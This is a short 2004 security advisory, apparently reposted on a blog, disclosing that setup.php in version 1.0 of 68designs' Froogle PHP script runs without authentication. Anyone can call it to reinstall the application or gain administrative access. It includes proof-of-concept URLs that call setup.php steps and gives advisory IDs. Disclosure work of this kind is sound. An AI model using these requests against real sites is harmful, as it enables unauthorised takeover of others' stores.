############################################
disclosure on Froogle php script by http://www.68designs.com/
target: froogle script version 1.0
vendor url: http://www.68designs.com/kb/link.php?id=5
impact: disclosure of instalation path .unauthoriced access
Xploit include: yes vendor informed :yes
OSVDB ID:12481
Secunia:SA13504
Securitytracker:1012553
############################################
Froogle script is a php web base script for adding in a ecomerce suit or store
and manage easy the Froogle´s account or offert products from Froogle.
In a defaults instalations this script need for install a file caled 'setup.php'
(no authentication is needed for run the script) any user can call
this file and reinstall the aplication in certs cases or obtain
administrative access to the aplication.
proof of concept :
http://[target]/froogle_path/setup.php
http://[target]/froogle/setup.php?option=step1
http://[target]/froogle/setup.php?option=step2
atentamente:
Lostmon (lostmon@gmail.com)
Thnx to estrella to be my ligth
Thnx to all who believed in me
Securitytracker url: http://securitytracker.com/alerts/2004/Dec/1012553.html
--
La curiosidad es lo que hace mover la mente....
Disclosure on Froogle php script and setup.php unauthorice access
Tuesday, December 14, 2004
Subscribe to:
Posts (Atom)